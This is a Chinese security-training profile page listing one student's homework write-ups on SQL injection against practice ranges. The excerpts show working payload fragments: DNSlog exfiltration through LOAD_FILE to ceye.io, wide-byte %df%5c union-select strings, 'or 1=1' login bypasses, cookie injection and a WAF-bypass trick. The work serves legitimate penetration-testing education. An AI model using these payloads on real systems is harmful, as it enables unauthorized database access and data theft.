Track 实习学员

tianlinghu

0关注
7粉丝
36文章
返回网站首页

您已发布 36篇文章作品写文章

5.2.1、MYSQL 注入 - 全方位利用 作业

我是先做的DNS注入,会过来又做的这个题,名字起的高大上,原来还是DNSlog的那一套,只是没有waf,不用加1.txt了,直接?id=1传参。那么就看我复制粘贴大法~1.打开http://ceye.io,看一下payloadSELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.

 2019-2-24
 0 
 21 

5.2.2、MYSQL 注入 - Dns注入 作业

Dns注入确实很强呀,利用UNC通用命名规则,把读取到的不能回显的内容发送到搭建好的平台,利用DNS解析,得到我们要查询的数据。打开靶场,发现有waf,于是我们利用apache的解析特性,我们在url后面加一个1.txt,然后对其进行传参,会绕过安全狗。1.打开http://ceye.io,看一下payloadSELECT LOAD_FILE(CONCAT('\\\\',

 2019-2-24
 0 
 82 

5.1.2、Access注入 — 偏移注入 作业

本题偏移注入,思路同上一题,看我复制粘贴大法~(粘的是自己的文章,老师不要打~)1.首先打开靶场:来到产品中心。先手动写cookie,在谷歌F12模式下,Console下写入document.cookie=("id=")+escape("105 and 1=1"); 回显正常。2.用order by命令查看输出点个数,这里发现document.cookie=

 2019-2-24
 0 
 56 

5.1.1、Access注入 — Cookie注入 作业

1.首先打开靶场:来到产品中心。先手动写cookie,在谷歌F12模式下,Console下写入document.cookie=("id=")+escape("105 and 1=1"); 回显正常。2.用order by命令查看输出点个数,这里发现document.cookie=("id=")+escape("105 order

 2019-2-24
 0 
 52 

6.5.1-SQL注入-Header注入Rank 1-3 作业

Rank1:视频中给出了源码:$insert="insert into 'security'.uagents'('uagent','ip_address','username') values('$uagent','$ip','uname')";然后又说明了题

 2019-2-24
 0 
 109 

6.6.3-SQL注入-Post注入Rank 1-3

POST注入,和GET的区别就是传参方式不同,至于注入方法,也没什么可说的,还是万能密码,'or 1=1-- Rank1:随便输入账号密码,回显为:Your sql statement is SELECT username, password FROM users WHERE username='123' and password='123' LIMIT 0

 2019-2-24
 0 
 87 

6.4-SQL注入-延时注入Rank 1-Rank 3

这里把三课并到一起了,感觉没有分开写的必要。延时注入和盲注差不多,盲注是看回显是否正确,延时注入是用sleep(N)函数判断是否等待N秒来确定是否正确,但核心还是拆解字符,二分法神马的做烦人了,sqlmap走起的话又怕被老师打,那么还是手动吧。if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句。于是我们把语句就变成了如下这样:if(判断字

 2019-2-24
 0 
 43 

6.3.3-SQL注入-宽字节注入Rank 3 作业

本题采用了POST方法,输入账号和密码。这里用到万能密码格式:123%df'or 1=1-- 。其实就是个逻辑或运算,但是我们输入到账号框里发现并没有什么卵用,于是我们用burp抓包看看:uname=123%25df%27or+1%3D1--+&passwd=&submit=Submit这里看到,我们输入的%df前面多了一个%25,url编码了%,于是我们把%25改成%,就

 2019-2-24
 0 
 138 

6.3.2-SQL注入-宽字节注入Rank 2 作业

仍然是个迷之作业,和rank1差不多,没发现什么本质区别,这次用%df%5c去做1.输入%df%5c'and 1=2 union select 1,2,3 --+   发现有两个注入点,2和32.输入%df%5c'and 1=2 union select 1,2,database() --+ 查看数据库名是security3.输入%df%5c'and 1

 2019-2-23
 0 
 45 

6.3.1-SQL注入-宽字节注入Rank 1 作业

宽字节注入,感觉就是利用编码不同将magic_quotes_gpc也就是\转义进行逃逸,或者说将它进行再次转义。由于数据库应用的GBK编码,所以%df%5c在gbk中表示的是 運 字,而 \ 是%5c,二者连接起来,正好可以把\转义掉。靶场的这个题,我们分析一下,当输入?id=1'and 1=1的时候,回显是Your sql statement is SELECT * FROM users

 2019-2-23
 0 
 63